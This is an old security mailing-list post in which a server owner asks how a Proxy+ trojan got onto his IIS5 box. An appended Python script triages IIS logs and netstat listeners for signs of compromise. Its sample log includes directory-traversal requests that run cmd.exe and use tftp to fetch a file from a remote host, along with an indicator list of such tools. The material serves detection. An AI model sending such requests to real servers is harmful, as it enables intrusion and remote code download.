Re: Proxy+ Trojan

From: Bill (proftpd@anatek.com)
Date: 02/04/03

    From: "Bill" <proftpd@anatek.com>
    To: <security-basics@securityfocus.com>
    Date: Mon, 3 Feb 2003 18:57:45 -0600
    
    

    Hamish,

    Sorry, I should have provided a better description to begin.

    > The simple answer is find out how it was put on there, and block off that

    That's the problem -- it's not so simple. This is a dedicated web server
    (Win2K/IIS5) that I have co-located in a top-tier data center. The app was
    installed remotely, and no logins were compromised. I had just finished
    having my SQL Server hardened (about 10 days _before_ Slammer!) and we ran
    some extensive password cracking software then. I was feeling pretty ok,
    and then I started getting SpamCop reports. I checked for an open relay a
    hundred times, but couldn't find anything. After a couple of days I found
    the copy of Proxy+ and blew it away. I then installed a software firewall,
    and I'm ok now (except for learning how to configure the firewall :-) ).

    The real problem is that I don't know how this install was done. I would
    really like to address this as an independent issue. I must have something
    configured horribly wrong, but how do I start the detective work? And now,
    everything seems suspicious. I feel the urge to disable every service! :-)

    Anyhow, if you have ideas on how an app could get installed remotely, I
    could start investigating.

    > Then do a security audit on that machine.

    I have subscribed to the SecurityMetrics offering, which I think will
    definitely help on an ongoing basis. But my situation is not ideal. I'm
    misconfigured, I'm sure, but handling it with a firewall. I want to be
    correctly configured and have the firewall as an extra measure of safety.

    I would enjoy hearing your speculation!

    Thanks!

    Bill
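
A starting point for the detective work Bill asks about, as an added example that is not part of the original thread and not the poster's own procedure. It does two things a responder would do first on a Win2K/IIS5 box where a proxy appeared without any credential compromise: walk the IIS W3C extended logs for requests that smell like something was fetched or executed through the web server (traversal sequences, cmd.exe, tftp and similar), and diff the current `netstat -an` listeners against an allowlist of services the box is supposed to offer, which is the disciplined version of "I feel the urge to disable every service". The log and netstat text below are constructed samples, the IP addresses are documentation ranges, and the indicator list is an assumption meant as a seed, not a signature set.

```python
"""Triage helpers for a compromised IIS 5 host (added example, not from the thread).

Both inputs are constructed samples: an IIS W3C extended log fragment and a
Windows 2000 style `netstat -an` listing. The indicator regexes are an
assumed starting list, not an exhaustive signature set.
"""
import re
from urllib.parse import unquote

# Constructed IIS 5 W3C extended log (field order comes from the #Fields line).
SAMPLE_IIS_LOG = """#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2003-01-28 00:00:01
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2003-01-28 00:00:01 192.0.2.10 GET /default.htm - 200 Mozilla/4.0
2003-01-28 00:00:07 198.51.100.7 GET /scripts/%2e%2e/%2e%2e/winnt/system32/cmd.exe /c+dir 200 -
2003-01-28 00:00:09 198.51.100.7 GET /scripts/%2e%2e/%2e%2e/winnt/system32/cmd.exe /c+tftp+-i+198.51.100.7+GET+setup.exe 200 -
2003-01-28 00:02:11 192.0.2.11 GET /images/logo.gif - 304 Mozilla/4.0
"""

# Constructed `netstat -an` output; 8080 stands in for "a listener I did not open".
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1433           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING
  TCP    192.0.2.1:80           198.51.100.7:3322      ESTABLISHED
  UDP    0.0.0.0:1434           *:*
"""

# Assumed indicator list: traversal out of the web root, and tooling that
# fetches or runs files. Extend it from what the logs actually show.
INDICATORS = {
    "traversal": re.compile(r"\.\.[\\/]"),
    "tooling": re.compile(r"(cmd\.exe|tftp|ftp\.exe|wscript|cscript|debug\.exe)", re.I),
}


def parse_w3c_log(text):
    """Yield one dict per request line, keyed by the names in the #Fields directive."""
    fields = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line.split()[1:]
            continue
        if fields is None:
            continue  # data before any #Fields line cannot be interpreted
        values = line.split()
        if len(values) != len(fields):
            continue  # truncated or rotated-mid-write line; skip rather than misalign
        yield dict(zip(fields, values))


def suspicious_iis_requests(text):
    """Return requests whose decoded stem+query match any indicator."""
    hits = []
    for rec in parse_w3c_log(text):
        target = rec.get("cs-uri-stem", "") + " " + rec.get("cs-uri-query", "")
        # IIS writes spaces as '+'; decode twice to see through double-encoding.
        decoded = unquote(unquote(target.replace("+", " ")))
        reasons = sorted(name for name, rx in INDICATORS.items() if rx.search(decoded))
        if reasons:
            hits.append({
                "time": rec["date"] + " " + rec["time"],
                "c-ip": rec["c-ip"],
                "request": decoded.strip(),
                "reasons": reasons,
            })
    return hits


def unexpected_listeners(netstat_text, allowed):
    """Return sorted (proto, port) pairs that are listening but not in `allowed`."""
    found = set()
    for line in netstat_text.splitlines():
        parts = line.split()
        if len(parts) < 3 or parts[0] not in ("TCP", "UDP"):
            continue
        proto, local = parts[0], parts[1]
        state = parts[3] if len(parts) > 3 else ""
        if proto == "TCP" and state != "LISTENING":
            continue  # established/time-wait sockets are not listeners
        port = int(local.rsplit(":", 1)[1])
        found.add((proto, port))
    return sorted(found - set(allowed))


if __name__ == "__main__":
    for hit in suspicious_iis_requests(SAMPLE_IIS_LOG):
        print(hit["time"], hit["c-ip"], ",".join(hit["reasons"]), hit["request"])
    expected = {("TCP", 80), ("TCP", 135), ("TCP", 1433), ("UDP", 1434)}
    for proto, port in unexpected_listeners(SAMPLE_NETSTAT, expected):
        print("unexpected listener:", proto, port)
```

Run it against the real logs by reading the IIS log directory and the saved `netstat -an` output instead of the samples. The second check is also why the open-relay tests kept coming back clean: an open-relay probe talks SMTP to the host's own mail port, while a proxy listening on some other port and willing to connect outbound to port 25 relays mail without the host being an SMTP relay at all, so the listener diff finds what the relay test cannot.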

